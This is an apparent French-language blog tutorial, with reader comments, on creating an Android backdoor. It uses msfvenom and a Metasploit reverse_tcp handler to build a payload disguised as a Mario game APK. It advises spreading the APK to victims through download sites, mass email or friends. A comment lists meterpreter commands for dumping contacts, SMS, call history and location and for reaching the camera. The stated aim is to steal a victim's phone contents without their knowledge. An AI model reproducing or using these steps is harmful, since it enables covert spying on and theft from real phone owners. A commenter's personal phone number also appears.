Bonjour à tous, aujourd’hui on va monté le Niveau un peu plus haut en créant un BackDoor pour Androïde. L’objectif est de créer une application ayant l’extension .APK puis la donner à une victime pour l’installer sur son téléphone et prendre (voler) toutes ce qui s’y trouve sans qu’il ne sache.
Je sais que vous allez me demander comment la donner à une victime
Mais…..C’est simple. Bon imaginons qu’on vous demande de mettre un cailloux dans le salon de votre voisin ! Comment allez-vous le faire ?
Solutions:
- Je lance le cailloux par une fenêtre ouverte du salon (mais s’il y’a une personne au salon…! Là, il y a problème.)
- Envoyer le plus naïf de la maison pour y déposer le cailloux proche de la télévision. (Rire)
- Faire du boucan sur le portail afin d’attirer l’attention du voisin et jeter le cailloux dans la maison
BON BREF…!
Le but est de trouver un moyen pour avoir une victime.
SOLUTIONS:
1. Mettre votre application .APK sur un site de téléchargement gratuit
2. L’envoyer par email à une victime ou à une liste d’adresse d’email
3. Le proposer à un ami de l’installer en lui expliquant que vous venez de créer le jeu Mario pour Androïde.
4. …………………A vous de réfléchir pour trouver une solution
OK! ASSEZ PARLE: COMMENT LE FAIRE ?
Pour cela vous aurez besoin de KaliLinux, car nous allons utiliser MetaSploit pour créer notre Jeu Mario.apk puis le remettre à un ami.
Pour le créer, nous allons utilisé un module de MetaSploit appelé msfvenom, avec la commande suivante:
|
1 |
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.10 R > /root/JeuMario.apk |
LHOST=192.168.0.10: est votre adresse IP Public ou Local (Public, si votre victime est hors de votre réseau local. Local, si votre victime est dans le même réseau que vous) R > /root/jeuMario.apk : Désigne que nous voulons créer un Fichier d’extension .APK du nom de JeuMario puis l’enregistrer dans le répertoire Root
Une fois votre JeuMario créé, vous devez préparer MetaSploit à recevoir des connexions entrant à votre ordinateur (LHOST) en tapant les commande suivantes successivement:
|
1 2 3 4 5 |
1. msfconsole 2. use exploit/multi/handler 3. set payload android/meterpreter/reverse_tcp 4. set LHOST 192.168.0.10 5. exploit |
Puis attendez qu’une victime ouvre votre application après l’avoir installé sur son téléphone androïde.
NB: set LHOST 192.168.0.10 => est l’adresse IP de votre machine (Local ou Public) spécifiée lors de la création de votre JeuMario.apk.
Une fois la connexion établie avec un Téléphone, vous pourriez voir:
– Tous ces numéros de téléphone
– Ces appels en Absences, émis, reçus
– Voir ces SMS, Photo, vidéos…..bien d’autres
Bonjour,
Merci pour votre tutoriel
Mais j’ai une question, une fois que la victime a ouvert notre appiclation quelle comande taper?
Merci de votre réponse.
Pour avoir toutes les commandes possible a exécuter, taper tout simplement:
help
Après que la victime ait démarré l’application, toi tu fais sysinfo pour avoir les informations sur son système android.. Ensuite tu peux faire :
-check_root (pour voir si le téléphone est rooté ou pas)
-dump_calling (pour avoir l’historique de ces appels téléphoniques)
-dump_contacts (pour avoir la liste des contacts de la victime)
-dump_sms (pour avoir tout ses sms)
-geolocate (pour avoir sa localisation au moment oû elle a démarré l’application)
Et bien d’autres méthodes pour avoir accès a sa caméra….
C’était Jim HSN du Benin.. Je suis au +22961306274
Merci…!!
Merci pour ces précisions.